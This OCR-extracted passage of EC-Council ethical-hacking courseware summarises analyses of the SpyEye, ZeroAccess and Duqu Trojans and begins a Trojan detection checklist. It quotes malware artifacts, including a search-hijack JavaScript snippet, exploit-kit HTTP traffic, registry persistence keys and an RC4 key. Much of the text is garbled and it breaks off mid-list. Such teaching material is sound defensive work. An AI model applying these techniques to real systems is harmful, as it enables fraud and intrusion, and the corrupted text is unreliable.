Tro jan A nalysis: SpyEye (Co nt’ nt’d d) Source: http://techblog.avira.com After execution, the Trojan connects to a server and sends some information about the system to the server such as: 0
MD5 of the executed sample
0
Operating Operatin g system version
0
Computer name
0
Internet Explorer version
0
User name
© Version number of the malware malwa re 3 □ □ ID 3
svchost exe sv svchost exe svchost.exe System System stem System ^ System stem ^ System stem ^ winlogon exe
Z3
1096 1272 1052 4 4 4 4 4 660
UDP UDP UDP TCP TCP UDP UDP UDP TCP
00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15
1034 1900 1032 netbios-ssn mciosoft-ds netbios-ns netbios-dgm rmciosott-ds 1063
■ ■ 00e5f6a15 00e»6a15 ■ ■ reve»se-mtl*76-76-9882 gogax co com
" " 0 0 “ " " hltps
USTENING USTENING
SYN_SENT
FIGURE 6.41: 6.41: Malw are injected piece of code within winlogon.exe virtual virtual address space
Module 06 Page 932
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Malware is packed with UPX and a polymorphic decryptor. In the code snippet that follows, you can see a call to another routine after the end of the usual UPX decryption: call sub 42F851. push push p us us h push push push le a push p u sh sh p us us h call leaue retn
eax 4 4 65 1 *7 4 Bh 4969h 3367h 5 047 h ecx, [ebp-1C h] ecx dijord p t r [ e b p -O -O C h ] d u or or d p tr tr [ eb e b pp - 10 1 0 h] h] s ub u b J *2 * 2 F 85 85 1
FIGURE 6.42: 6.42: Malw are is packed with UPX and a polymorphic decryptor
Module 06 Page 933
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
T rojan A na lysis: lysi s: Zero A ccess
CEH
(«rt1fw4
itfcwal NmIm
ZeroAccess, also known as "Smiscer" or "Max++ rootkit," is a malicious Windows threat used to generate revenue primarily through pay-per-click fraud It arrives through various vectors, including web exploit kits and social engineering attacks, and uses low-level rootkit functionality to remain persistent and stealth ZeroAccess downloads fake security software, performs click fraud and search engine poisoning
SSSE39
jwon:
lcclearn ■Uddtot Novkt
Example advertisement for the Clicklce payper-dick network
I-Ortt
*v»x *v»xi5
U
• ckklic Pay Per dtk Dear sirs! W* proud to armour*.• 4 ••* modem tokAum h• POC 04ffc.. 04ffc.. caf ed Cfecklc* PPC clickicocom CMcklce Teamncfcides professionals of vanous lie kJs. who are woriong ever y day to make th« PPC eve n better t or you. Apart fromgenerous bids. Cbddce P K offers you tf*e fo*o*nng: 1. Advanced f*«d vvrwon 2. Our 2. Our admnntratrve nter faee m rixies a number or uOMies for traffic proeesartg. S. To *•irjjlify your work «Mth 6tat *tK t, >t * pouAitv to choo•• CMf-baMd lira• »Uft for it. 4. An entire eoaecttcn of feeportcan be reached via ICQ. live Chat, e*mal or ticket system.
Just give ve it a try try and then then make an informed decis decision. ion. :) dcbce.com
http .//w symantec.com //w ww.syman Copyright © by EG-G*ancil. All Rights Reserved. Reproduc tion Is Strictly Prohibited.
Tro jan A nalysis: nalysis: ZeroA ccess Source: http://www.symantec.com ZeroAccess, also known as "Smiscer" or "Max++ rootkit," is a malicious Windows threat used to generate revenue primarily through pay-per-click fraud. ZeroAccess uses low-level rootkit functionality to remain persistent and stealth. It arrives through various vectors, including web exploit kits and social engineering attacks. Although ZeroAccess contains generic backdoor functionality that could be used for multiple purposes, it has been observed downloading fake security software, performing click fraud, and searching engine poisoning. Click Click fraud schem e
Upon infection, ZeroAccess will install additional payload modules, downloaded through its back door. Generally, this is an executable that performs click fraud. This click fraud scheme has been observed to utilize more than one pay-per-click affiliate network. Advertisers sign up with ad networks that in turn contract website owners who are willing to display advertisements on their websites in exchange for a small commission. The ad networks charge the advertisers for distributing and displaying their ads and pay the website owners a small commission each time a visitor views (pay-per-view) or clicks (pay-per-click) on the ads.
Module 06 Page 934
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
• d c k l c e P a y P e r C f ck ck Dear Srs!
We are proud to announce a new modem solution for PPC traffic, caled Ckcklce PPC clickice.com CUcklce Team includes professionals of various fields, who are worlung every day to make this PPC even better for you. Apart from generous bids, Clicklce PPC offers you the folowrx): 1. Webmasters Advanced feed version. 2. Our administrative administrative interface includes a number of utihbes for tra ffic p rocessng. 3. To swnplify your work with statistics, it is possible to choose GMT-based dme shift for it. 4. An entire collection of feeds is provided (Php feeds, Pubfcc Feeds, Image feeds, JavaScript and XML feeds). 5. Databases of specialized keywords are provided; it is also posstole to obtavi mche-specific customized keyword bases free of charge based on webmaster's cnteria. 6. Our support can be reached via ICQ, Live Chat, e-mail or tick et system.
Just give it a try and then make an informed decision. :) cbck 1ce.com
FIGURE 6.43: Example advertisement for the Clicklce pay-per-click network
Module 06 Page 935
Ethical Hacking and Counte rmeasu res Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
T r o j a n A n a l y s is i s : Z e ro ro A c c e s s (Cont’d)
J
In addition addition to generating revenue through through pay-per-click networks, ZeroAccess hijacks user's searches
C EH Urt1fw4
ilhi ul
lUtbM lUtbM
An example of returned HTML can be seen below
When an infected user searches in popular search engines, (including google.com, bing.com, icq.com, yahoo.com, ask.com, and aol.com), ZeroAccess sends an additional GET request similar to the following:
f uncti uncti on Form FormatRed atRedii rect( ref , t i t l e) { body body = " > " + t i t l e + " t i t l e> head> f r ameset > ht ml >" ;
http: //suzu //suzuki 111x 111 [ . ] an/r/re an/r/redir direc ect. t.php ?Xd=9de5404ac67a404a0ela775f212cd210 &u=198&cv=150&sv=15&os=501.804.x86 86
AddPage("w AddPage(" www.googl .goo gl e. com co m. hk/ sear ch?q=car &hl =zh- CN&sour ce= hp& hp&gbv= gbv=l ", 2, 2, nul l , 0, "HTTP/ "HTTP/ 1.1 200\r 200\r \ nConn onnect ect i on: on: cl ose\r \ nCach nCachee- Contr Contr ol : nono- cache cache\\ r\ nPragm nPragma: no- cache\ cache\ r \ nCon nContt ent ent Lengt Lengt h: " + body.l ength ength + "\ r\ n\ r\ n" +bod +body);
This causes an additional pop-up window or tab to be created, the new window or tab will contain search results for the original search query with hijacked links or additional content
} Format Redi edi r ect( "kozanekozasea "kozanekozasearr chsys t er n. com/ ?searc ?s earc h=car &subi d=198& 198&key=4 15db60c8aa81c 0bed€8", "car ") ;
http://www.symontec.com Copyright © by
EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
ggjj T rojan A na lysis: Ze roA ccess (C on t’d) t’d) Source: http://www.symantec.com In addition to generating revenue through pay-per-click networks, ZeroAccess hijacks users' searches. When an infected user searches in popular search engines (including google.com, bing.com, icq.com, yahoo.com, ask.com, and aol.com), ZeroAccess sends an additional GET request similar to the following: http://suzukimxml . lcn/r/redirect.php?id=9de5404ac67a4 lcn/r/redirect.php?id=9de5404ac67a404a0ela775f212cd210&u=19 04a0ela775f212cd210&u=198&cv=l 8&cv=l 50&sv=15&os=501.804.x86 This causes an additional pop-up window or tab to be created. The new window or tab will contain search results for the original search query with hijacked links or additional content. An example of returned HTML can be seen as follows.
Module 06 Page 936
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
1:
f unct i on Fo For mat Redi r ect( r ef , t i t l e) { body = " ad> " + t i t l e + " t i t l e> head> head> f r ameset > ht ml >" ; AddPage("w AddPage("www. googl googl e. com. hk/ s ear ch?q= ch? q=car &hl =zh- CN&sour ce= hp& hp&gbv=l " , 2, nul l , 0, " HTTP/ TTP/ 1. 1 200\ r \ nConnect i on: cl ose\ se\ r \ nCach nCachee- Cont ont r ol : no- cach cache e\ r \ nPr agm agma: no- cache\ cache\ r \ nCont ont ent ent Len Lengt h: " + body. l engt h + " \ r \ n\ r \ n" + body) ;
4:
}
For mat Redi edi r ect (" kozan kozanek ekoza ozasea searr chsys t em. com/ ? s ear ch=car &s ubi d=l 98&key= key=4 15db60c8aa81c 0bed6 ed68" , " car ); FIGURE 6.44: An example of returned HTML
Module 06 Page 937
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
T r o j a n A n a l y s is i s : Z e ro ro A c c e s s
(Cont’d)
| f5 f5 ET ET / o a n p 9 1 l c m / ? 4 H T T P / 1 . 1 Host: lovrru3tard.org yL U s e r -A -A g e n t : H o s i l l a / 5 . 0 A c c e p t: t: t e x t / x m l , a p p l i c a t i q A c c e p t - L a ng ng u a g e : e n - u s , e n ; q = 0 . 5 A c c e p tt- E n co c o d i ng ng : g z i p , d e f l a t e Accept-Charaet: ISO -8859 -1,utf8 ;q-0.7,*;q*0.7 Keep-Alive: 300Connection: keep-alive
Main Attack URL
Ie1n, tet eUxS;St; / hr vt ms l .l8; .q1*.01 .39), t Ge xe ct /p/kpol/2/2a 0i n0 8; q030301. 18
•chtxnlxbodvxd iv id - ' w a g 'x / d i v x d i v i d - lat x / d i v x d l v < a ! v l d = r a j > < / d lv lv xc x c l 1 v| v| ^ T W ^ S b 2 7 ^ t; u , . a , c t , o , . k , , , h , i . e . a c c e p t -e -e n c o d l n g : p a « _ ' 1 -1 1 .1 content-type: appii 0 ; q < h ; q + + ) ( o + - p ; c f . c h a r js e r -A g e n t: m __ o z i111 11 aa/ 4 . 0 C ( j / a ) ; k - p a t . s e I n t ( c , 1 6 ) ; « H o s t : l o v r f n u s t a rd rd . o r ! A c ce p t:t: t e x t / h t m l , ? m a g e /g /g i (a m p , fid ); K a fb Q 3 L k Y7 8 Y « f ' ; lei■ i■ 7 ;ab s= cu n(p ya ,leic o n n e c t i o n : k e e p - a l i v e
11
( ^H fertifM | EUkj I IlMkM
Fire fox /2.0.0.13 ,lm age/png,»/ ;q-0.5
1x/div; i d - ’ £rv ' x / d i v x d i v i d - fu fu d ' x / d i v x d i v i d - ’h a g 5 5 60 60 4 ^6 ^6 01 01 0 0 0 ;! ;! 0 . : 5 5 5 2 0 6 5 1 ; .' <05 51 .,| H T T F / 1 .1
Second Stage Exploits
200
U o p . a v e ) ; u m » - ' Q IP IP 5 b 5 79 79 0 h t t p / 1 - 1 ok [ o u l ] ; f u n c t i o n s h h ( u ) ( r e j a t e : T u e. e. 2 5 O c t 2 01 01 1 1 5 : 1 9 : 2 0 GMT v , p , » , £ , r ; a - ' P t d 8 E a m l l E 4 ; e r v < > r : A p a c h e / 2 . 2 . 1 7 ( U n i x ) p h p /5 .2 .1 ? k p h p / po w er ed -B y: 5 . 2.17 Jun ction 3 ay(v,w,k) (var .ontent-Length: 4096 (v,y) > functio ion 0 rc(0 )(vajr| -orrtep ‘ - . ' - ■ ■ 1/^15Vce4c^T84r3r 52 dO c 5 7 0 7 0 4 5 e 02 02 5 4 5 4 0 1 0 7 5 c 5 0 0 3 ; 1 ; 52 54 4cr {SW5^ fT^ 7 0 1 0 2 O dO (g,4) ;ca a' 'cl)an g 261n '; d r u 61n T ° " t ! |u | u 5 e r A g en en t : m 071 1 7 1 1 W 4 . 0 ( * 1 m i aw aw 5 xp xp 5 . 1 ) i l l [x ]; a ■ ♦ ■ ♦ )( If (q C 1 ! (b a r[a [a j [ < - c a c ^o s t :: T d . org \ 10o w u s t a rrd. 1/ 3 , s , k , r , a ; 1 - '0 '0 5 7 5 0 0 7 76 76
ZeroAccess Download Download
m ,a;9 ;9'■L d 8 E m 6 Q v, k , z, x ,v, 3, h ,1 ' “ ,51•K (» ,8 );d -m Y 9 g 4 a 5 b 8 a t 3 I d w . iff(w (w )(vac k ,y ,s,n ,u,r, z *
(r, 3);
m p Tue, / 1 • 1 25 20 0Oct0K 2 0 1 1 1 5 : 4 9 : 2 1 GMT :>ate: 3 s e r v e r : A p a c h e / 2 .2 .2 . 1 7 ( u n 1 x ) p h p / 5 . 2 .1 .1 7 •• <-P0wered B y : p h p / 5 . 2 . 1 7 : o n t e n t L e n g t h : 2 4 3 37 7 1 2 - Q9PE430I08LPtfe < Z o n t e n t - D i s p o s i t i o n : i n l i n e ; f i 1 en en a m ee- em em g d E8 E8 v 64 64 •° : o n t e n tt - T y p e : a p p 1 1 c a t 1 o n / 0 c t e t - s tr tr e a m 8.. 8F *-pad: avoid browser bug ..pk . <_cache: miss from doma n.com J . E . . < e e p - A l 1 v e: e: t i m e o u t - 1 - L- c o n n e c t i o n : K e e p - A l i v i a ET ET ph p >w=19 .e82 &f 44 4 f a 78 M 4 4 di 5 « Wi 62 4 « & 6 c 4 a- i 3 *ost: exezkzla.cn , , s e r - A g e n t : o p e r a / 6 ( w in in d ow ow s mt 5 . 1 ; u ; L a n g i D - 4 0 9 ; x 8 6 ) Connection: close
•Y
1
ZeroAccess Download Download
.
Exploit kit dropping ZeroAccess
http://www.5ymantec.com
Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Trojan Analysis: ZeroAccess (Cont’d) Source: http://www.symantec.com ZeroAccess can also be installed through web exploit kits. The user is often falsely given the impression they will be installing an update for an application, such as Adobe Flash player. This use of various exploit kits to install ZeroAccess is likely simply a byproduct of its authors attempting to evade IPS rather than an indication of ZeroAccess being sold to other distributors.
Module 06 Page 938
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
SET / 0snp91i cm/ ?4 HTTP/ 1■ 1 P/1.1 Hose: ose: l owmust ard. org Userser- Agent: gent: Hozi l l a/5. 0 - US: r v: 1. 8. 1. 13) Gecko/ ecko/ 2008 200803 0311 11 Fi r ef ox/ 2.0. 0. 13 Main Attack URL ■1en 1/ t ext ext / html ; q- 0. 9, text / pl ai n; q-0. 0, i mage/pn age/png, g, */*; q- 0.5 Accep ccept: t ext/ xml ,app ,appl i cati cati Accept- Langua Language ge:: en- us, en; q=0. 5 Acceptccept- Encod Encodii ng: ng: azi p, def def l ate Accept ccept - Char har set: I SO- 8859 859- 1, utr - 8; q-0. 7, ; q-0. Keep Keep-- Al i ve: ve: 300C 300Connect onnect i on: keep keep-- al i ve c h t ml x bo bo dv dv x di di v i d=' wa g' g' x / d i v x di di v i d=' l a t ' x / d i v xd xdi v i d* ' f r v ' x / d i v x di di v i d=' f u d' d' x / d i v x di di v i d= d=' ha ha a1 a1x / d i v d1 V> 0snp? >11an7, ~H^5027aeebF56a: ! dl 05ei eS60905 5604 5c6801 5c6801 uC 01 uc5 5! 1 5 6 5 1 0' 51 11505. htt p, /1.1 r r o n t _ o n rn r n H 1 n n ■ 1 / 1 /H P _ n u, u, a, q, o, z, k,c, j,h, 1 ,c, accept-encoding: pack2 content-type: ajpplicat 0; q
; k pa r s el el nt ( c , 1
6
Second Stage Exploits 1mage/;)pe 1mage/;)peg, g,
q=.2,
q=.
( 10p, ave) ; umm=' QI P5&5790 5790 HTTP/1.1 200 OK [oul ] ;f uncti uncti on shh( shh( u) {re Dat e: Tue, 25 Oct 2011 2011 15:4 9:20 GMT GMT v, p,w, p,w, f , r; w=' Ptd8 Ptd8Ea1rl l E4 Server: Apache/2.2.17 (Unix) PHP/5.2.17 f unct nct i on j ay(v,m, k) fvar fvar x-Powered-By: PHP/5.2.17 (v, (v, y) ) f unct unct i on orc( o) (v«J^ontent-Length: 4096 onTejG ET~ V □snp'91 91i cm/^'l5Vc e-e 6 8 ‘5a f 3 ? 5 5 4 4 2~J2' 2~J2'5T851 V f 5 70102OdOc 570704 570704 5e02 5e02 54 5401075c 5003: 1: (g, (g, 4) ; c=' cl kmg26m g26m' ; d=r unconte unco nte UserAqen t: Mozi 11 a/4 .0 (windows x p 5.1) [x] ; a++) {i f ( q(l ] ( bar [a] [a] [ x-cac Host: lc'Mnustard.ora l j , z, k, r , a; l - ' G575G 575GQ776 776 Keep- Accept: Text/html, image/gif, image/jpeg, ZeroAccess Download Download [k] ; ++) ( t ry( z =neu neu Act i v: °nne °nne connection: keep-alive in, in, a;r o- 9 Ld6Em6Q' ; a* cun ( ^ HTTP/1.1 200 OK w, fc, z, x,v, 3 , h, 1, d; d; z* ' bl e K-* K-* . . Da te: Tue, 25 Oct 2011 15 :49 :21 GMT (w, 8) ; d- »Y9g4a5b8 »Y9g4a5b8at at 3 I da, . ser ver : Apache/2.2.17 (un ix) ph p /5.2.17 (w) {va {varr k, y, s, n, u, c2 r• ••X-Powered-By: PMP/5.2.17 i n (w 109* 09* 3;( 3, )PE43 )PE430I 0I 08LPtf 08LPtf e ■G. '.Y. Content-Length: 243712 ____
.0 . . .
con tent- Disp ositio n: in lin e ; f i lena lenam me=em e=emgd gdE8 E8\/ \/6. 6. ontent-T/pe: ontent-T/pe: app licat ion/octet-stream
8. . 8F x Pad: avoid browser bug
ZeroAccess Download Download . .PK. x-cache: m i s s from domain.com >. E.. Keep-Alive: timeout=1! connection: Keep-Aliv
0 444
444 565 41054 66 -13
....................................
FIGURE 6.45: Exploit kit dropping ZeroAccess
Module 06 Page 939
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
T r o j a n A n a l y s is i s : Z e ro ro A c c e s s
(Cont’d)
( ^H (•rtifwd | tt kKJi NmIm
Upon execution, ZeroAccess selects a random
The Trojan then creates the following registry
driver driver alphab alphabetic etically ally between between % Sys tem %\ D r i v e r s \ c l a s s p n p . s y s a nd nd
entries to ensure the newly infected driver serves as the main load point for ZeroAccess:
% S y s t e m % w i n 3 2 k . s y s a nd nd o v er er w ri ri te te s th th e
e HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Services\[FILE n a m e OF INFECTED DRIVER]\ I m a g e Pa t h = "\*
driver with its own code The original clean driver is stored in a hidden
HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Services\[FILE NAME OF INFECTED DRIVER]\"Type" = "1"
encrypted NTFS volume using the file name
%Sys t em%\ conf co nf i g\ S>
O HKEY_LOCAL_MACHINE\SYSTEM\CurrentCont rolSet\Services\[FILE NAME OF INFECTED DRIVER] DRIVER] V'Start" = ”3"
The hidden volume is used to store the original clean driver as well as additional components and downloaded payload modules
Code is then injected into services.exe through an
The volu me is rough ly 16 MB in size size and is is
APC which encrypts the data stored in the hidden NTFS volume under \??\ACPI#PNP0303#2&da
accessed through the file system device name: \\??\ACPI#PNP0303#2&dala3ff&0
m
t '
°R y
la 3 ff & 0 \ U and and also also creates creates an an altern alternate ate data data st re re am am fi fil e % S y s t e m D r i v e % \ 2 3 8 5 2 9 9 0 6 2 : 230 226 827 3 . exe and execut executes es it These main loader components ensure the additional payload files stored in the hidden NTFS
\P
volume are loaded and executed
h ttp:// www.symantec.com www.symantec.com Copyright © by
EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
^ Tro jan A nalysis: nalysis: ZeroA ccess (Con t’d t’d) Source: http://www.symantec.com Upon
execution,
ZeroAccess
selects a random driver alphabetically between %Syst em%\ Dr i ver s\ cl asspn ass pnp. p. sys and %Sys t em%wi n32k. n32k . sys and overwrites the driver with its own code. The original clean driver is stored in a hidden encrypted NTFS volume using the file name
%Syst Sys t em%\ conf i g\ TERS>. The hidden volume is used to store the original clean driver as well as additional components and downloaded payload modules. The volume is roughly 16 MB in size and is accessed through the file system device name:
\ \ ?? \ ACPI #PNP0 PNP030 303# 3#2&dal dal a3f a3f f &0 For example, the original clean driver is stored at:
\ \ ? ? \ ACPI #PNP03 PNP0303 03# #2&dal a3f f &0\ L\ [ EI GHT RANDOM CHARACTER TERS] . This file system of the hidden volume is encrypted using RC4 with the following 128-bit key:
\ xFF\ xFF\ x7C x7C\ xFl xFl \ x64 x64\ xl 2\ xE2 xE2\ x2D x2D\ x4D x4D\ xBl xBl \ xCF\ xCF\ x0F\ x0F\ x5D x5D\ x6F\ x6F\ xE5 xE5\ xA0 xA0\ x4 9 The Trojan Trojan then creates the following registry entries to ensure the newly infected driver serves as the main load point for ZeroAccess:
Module 06 Page 940
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
©
HKEY_L EY_LO OCAL_ MACHI NE\ SYS SYSTEM TEM\ Cur r ent ent Cont ont r ol Set \ Ser vi ces\ [ FI LE I NFECTED FECTED DRI VER] VER] \ I magePat h = " \ *
NAME
OF
©
HKEY_LO EY_LOC CAL_M L_ MACHI NE\ SYSTE YSTEM M\ Curr ur r ent ent Cont ont r ol Set Set \ Ser Ser vi ces\ [ FI LE I NFECTED FECTED DRI VER] VER] \ Type1 Type1"" = "
NAME
OF
©
HKEY_LO EY_LOC CAL_M L_ MACHI NE\ SYSTE YSTEM M\ Curr ur r ent ent Cont ont r ol Set \ Ser Ser vi ces\ [ FI LE I NFECTED FECTED DRI VER] VER] \ Start3" = "
NAME
OF
Code is then injected into services.exe through an APC. The injected code encrypts the data PNP0303 03# #2&dal a3f f &0\u stored in the hidden NTFS volume under \ ?? \ ACP1#PNP03 &0\u and also creates Sys t emDr i ve%\ 23852990 2385299062: 62:23022682 2302268273. 73. exe exe and executes it. an alternate data stream file %Syst These main loader components ensure the additional payload files stored in the hidden NTFS volume are loaded and executed.
Module 06 Page 941
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Tro Troj an A n a ly s is is:: D uq uqu u Duqu is a sophisticated Trojan that acts as a backdoor and facilitates the theft of private information
CEH
UrtifWtf IthKJi lUikM
Code section, Duqu payload DLL 10001000 C++ Standard Templat e Library functions
.100042SO Native C++ code with STL
1000C2C9
The code section of the Payload DLL is common for a binary consists of "slices" of
Payload Other Language C framework
/
code that may have been initially compiled in separate object files before they were linked in
No C++
a single DLL
10023878 10028F2C
(STL) functions, run-time library functions, and user-written code, except the biggest slice that
1002EAD1
contains most of C&C interaction code
+
Nativ e C+ code with STL
Most of them can be found in any C++ program, like the Standard Template Library
Run-Time library code
100MOM
Native C code for injection API thunks. Exception handlers
http://www.securelist.com Copyright © by EG-G*ancil. All Rights Reserved. Reserved. Reproduction is Strictly Prohibited
£
3 ^
Trojan rojanAnalys nalysiis: Dut*u Source: http://www.securelist.com
Duqu is a sophisticated Trojan that acts as a backdoor and facilitates the theft of private information. The code section of the Payload DLL is common for a binary that was made from several pieces of code. It consists of "slices" of code that may have been initially compiled in separate object files before they were linked in a single DLL. Most of them can be found in any C++ program, like the Standard Template Library (STL) functions, run-time library functions, and user-written code, except the biggest slice that contains most of C&C interaction code.
Module 06 Page 942
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Code section, Duqu payload DLL .loooitxio C++ Standard Tem plate Library functions .100042 SO Native C++ code with STL .1000CZC9
Payload Other Language Language / C framework No C++
.10023878 Native C++ code with STL -10028F2C Run-Time Run-Time library code •1002EAD1 .100300A4
Native C code for injection API thunks. Exception handlers
FIGURE 6.46: Duqu Tool Screenshot
Module 06 Page 943
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Trojan Analysis Analysis:: Duqu Framewo Fram ework rk D u qu qu F r a m e w o r k Code Properties S
Everything is wrapped into objects
S
Function table is placed directly into the class instance and can be be modified after construction
S
There is is no distinction between utility utili ty classes (linked lists, hashes) hashes) and user-written code
S
Objects communicate communicate using using method calls, deferred execution queues, and event-driven callbacks
S
There are no references to run runtime library functions; native Windows API is used instead
CEH
E v e n t D r i v en en Framework Event objects, based on native Windows API handles Thread context objects that hold lists of events and deferred execution queues M
Callback objects that are linked to events Event Eve nt monitors, monitors, created by each thread context for monitoring events and executing callback objects Thread context storage manages the I list of active threads and provides provides access to per-thread per-thread context objects I
http://www.securelist.com Copyright © by EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
r ^ 1—
Trojan Analysis: Analysis: Duqu F ram ew ork Source: http://www.securelist.com This slice is different from others, because it was not compiled from C++ sources. It contains no references to any standard or user-written C++ functions, but is definitely object-oriented. It is called the Duqu Framework. Duqu Framework Code Properties
The code that implements the Duqu Framework has several distinctive properties: 9
Everything Everyth ing is wrapped wrap ped into objects
9
Function table is placed directly into the class class instance and can can be modified after construction
9
There is no distinction betwe b etwe en utility uti lity classes classes (linked lists, lists, hashes) and user-written code
9
Objects communica commu nicate te usin using g method calls, calls, deferred defer red execution queues and event-driven callbacks
Module 06 Page 944
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
9
Exam 312-50 Certified Ethical Hacker
There are no no references to run-tim run-time e library functions; native Windo ws API is used used instead
Event-Drive Event-Driven n Framework The layout and implementation of objects in the Duqu Framework is definitely not native to C++ that was used to program the rest of the Trojan. There is an even more interesting feature of the framework that is used extensively throughout the whole code: it is event driven. There are special objects that implement the event-driven model: 9
Event objects, objects, base based d on native Wind Wi nd ow ows s API handles
Q Thread context objects that hold hold lists lists of events event s and and deferred execution queues Q
Callback objects that are linked to events
© Event monitors, created create d by each thread thr ead context conte xt for monitoring events and and executing executing callback objects © Thread context storage manages the list of active threads and provides access to perperthread context objects objects
Module 06 Page 945
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Trojan A nalysis: nalysis: Event Driven Framework
C EH 0
J This event-driven model resembles Objective C and its message passing features, but the code does not have any direct references to the language, neither does it look like compiled with known Objective C compilers
0
0
Object 2
Object 2
*L--- X---
Event Object
...........
Monitor H -Event -- * ---
...........
•>
Event Object
Event Monitor
Callback Object
Callback Object Thread Context: Event and Call Call Queue
Object 1
Object 1
Thread Context: Event and Call Queue
* Thread Context Storage
Thread Context Storage
http://www ttp:// www..securelist, securelist,com Copyright © by
EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.
Trojan Analysis Analysis:: Event D riven ri ven Fram ew ork Source: http://www.securelist.com The event-driven model resembles Objective C and its message passing features, but the code does not have any direct references to the language, neither does it look like it is compiled with known objective C compilers.
Object 2
Object 2
y Event Object
Event Monitor ---------
Callback Object Object 1
4
*
Event Object
Event Monitor ---------
--------
Thread Context: Event and Cali Queue
Callback Object ...........
Object 1
Thread Context Storage
»
*
---------
Thread Context: Event and Call Queue
Thread Context Storage
FIGURE 6.47: Event Driven Framework
Module 06 Page 946
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
M odule Flow Flow So far, we have discussed how a Trojan infects a system and the types of Trojans available. Now we will discuss how to conduct Trojan detection. Trojan detection helps in detecting the presence of Trojans on an infected system and thus helps you in protecting the system and its resources from further loss.
Tro jan Concepts
, •
Co u nte rm e a su re s
Trojans Infection
f|j||
^— v—
Types Types of Troja Trojans ns
^
f ^
Trojan Trojan Detection
■ 4
Anti-Trojan Software
1 Penetration Testing Testing
This section focuses on Trojan detection using various techniques or methods.
Module 06 Page 947
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Trojans and Backdoors
Exam 312-50 Certified Ethical Hacker
Scan for suspicious OPEN PORTS
Scan for suspicious STARTUP PROGRAMS
> 4
Scan for suspicious RUNNING PROCESSES
Scan for suspicious FILES and FOLDERS
Scan for suspicious REGISTRY ENTRIES
Scan for suspicious NETWORK ACTIVITIES
9
0
Scan for suspicious DEVICE DRIVERS installed on the computer
Scan for suspicious modification to OPERATING SYSTEM FILES
9
0 Run Trojan SCANNER to detect Trojans
Scan for suspicious WINDOWS SERVICES
9
0
Cbpyright © by
EC-CMMCil. All Rights Jte$ervfed' Jte$ervfed'.;Reproduction .;Reproduction is Stric tly Prohibited.
How How to to D etect Trojan s Trojans are malicious programs that masquerade as a useful or legitimate file but their actual purpose is to take complete control over your computer, thereby accessing your files and confidential information. In order to avoid such unauthorized access and to protect your files and personal information, an antivirus product has to be used, which automatically scans and detects the presence of Trojans on your system or you can also detect the Trojans installed on your system manually. The following are the steps for detecting Trojans: 1. Scan Scan for for suspi suspicio cious us OPEN PORTS PORTS 2. Scan Scan for suspic suspiciou ious s RUNNING RUNNING PROCESSES PROCESSES 3. Scan Scan for suspic suspiciou ious s REGISTRY REGISTRY ENTRIE ENTRIES S 4. Scan for suspicious DEVICE DRIVERS installed on the computer 5. Scan Scan for susp suspic iciou ious s WIN DO WS SERVICES SERVICES 6. Scan Scan for for susp suspic iciou ious s START STARTUP UP PROGRAMS 7. Scan Scan for suspic suspiciou ious s FILES FILES and and FOLDERS FOLDERS 8. Scan Scan for for suspic suspiciou ious s 